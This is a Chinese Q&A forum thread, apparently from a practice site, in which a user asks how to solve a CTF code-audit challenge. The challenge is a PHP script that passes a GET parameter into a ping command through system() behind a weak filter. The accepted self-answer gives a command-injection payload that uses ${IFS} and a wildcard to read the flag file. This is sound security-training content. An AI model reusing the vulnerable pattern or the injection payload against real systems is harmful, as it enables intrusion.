jemus_i 2024-05-10 01:27 采纳率: 100%
浏览 4
已结题

关于#CTF#的问题,如何解决?(相关搜索:代码审计)

这个是题目

img


我给他提出来

<?php
highlight_file(__FILE__);
if(preg_match('/\ |flag|\#/',$_GET['tag'])){
    die('hacker!');
}else{
    $tag $_GET['tag'];
    $cmd 'ping -c 3 ' . $tag;
    system($cmd);
}

哥们我想了好久,他没有说明flag文件,就想到了是不是要提权,通过这个system函数

  • 写回答

4条回答 默认 最新

  • jemus_i 2024-05-16 12:02
    关注

    铁铁们,答出来了

    
    $tag=;cat${IFS}/fla*
    

    分号是不管前面执行是否失败,会自动执行分号后的代码

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论
查看更多回答(3条)

报告相同问题?

问题事件

  • 系统已结题 6月27日
  • 已采纳回答 6月19日
  • 创建了问题 5月10日

悬赏问题

  • ¥15 PADS Logic 原理图
  • ¥15 PADS Logic 图标
  • ¥15 电脑和power bi环境都是英文如何将日期层次结构转换成英文
  • ¥20 气象站点数据求取中~
  • ¥15 如何获取APP内弹出的网址链接
  • ¥15 wifi 图标不见了 不知道怎么办 上不了网 变成小地球了
  • ¥50 STM32单片机传感器读取错误
  • ¥15 (关键词-阻抗匹配,HFSS,RFID标签天线)
  • ¥15 机器人轨迹规划相关问题
  • ¥15 word样式右侧翻页键消失